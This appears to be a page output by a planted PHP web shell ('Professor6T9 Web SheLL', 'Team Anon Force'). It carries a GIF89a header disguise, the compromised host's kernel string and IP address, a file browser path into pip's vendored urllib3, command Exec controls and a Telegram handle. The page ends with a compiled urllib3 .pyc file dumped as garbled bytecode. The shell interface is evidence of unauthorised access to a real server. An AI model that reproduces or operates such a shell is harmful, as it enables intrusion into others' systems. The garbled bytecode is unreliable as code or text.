GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python36
/
lib
/
python3.6
/
site-packages
/
pip
/
_vendor
/
urllib3
/
__pycache__
[ HOME ]
Exec
Submit
File Name : __init__.cpython-36.pyc
3 �Re{ � @ s4 d Z ddlmZ ddlZddlmZmZmZ ddlm Z ddl mZ ddlm Z mZmZ dd lmZ dd lmZ ddlmZ ddlmZ dd lmZ ddlZddlmZ dZdZdZd&Zej e!�j"e� � ej#fd d�Z$[ej%d!e j&d"d#� ej%d$e j'd"d#� ej%d$e j(d"d#� ej%d$e j)d"d#� e j*fd%d�Z+dS )'z8 urllib3 - Thread-safe connection pooling and re-using. � )�absolute_importN� )�HTTPConnectionPool�HTTPSConnectionPool�connection_from_url)� exceptions)�encode_multipart_formdata)�PoolManager�ProxyManager�proxy_from_url)�HTTPResponse)�make_headers)�get_host)�Timeout)�Retry)�NullHandlerz(Andrey Petrov (andrey.petrov@shazow.net)�MITz1.25.9r r r r r r r �add_stderr_loggerr �disable_warningsr r r r c C sF t jt�}t j� }|jt jd�� |j|� |j| � |jdt� |S )z� Helper for quickly adding a StreamHandler to the logger. Useful for debugging. Returns the handler after adding it. z%%(asctime)s %(levelname)s %(message)sz,Added a stderr logging handler to logger: %s) �logging� getLogger�__name__� StreamHandler�setFormatter� Formatter� addHandler�setLevel�debug)�level�logger�handler� r! ��/builddir/build/BUILDROOT/alt-python36-pip-20.2.4-5.el8.x86_64/opt/alt/python36/lib/python3.6/site-packages/pip/_vendor/urllib3/__init__.pyr / s �alwaysT)�append�defaultc C s t jd| � dS )z< Helper for quickly disabling all urllib3 warnings. �ignoreN)�warnings�simplefilter)�categoryr! r! r"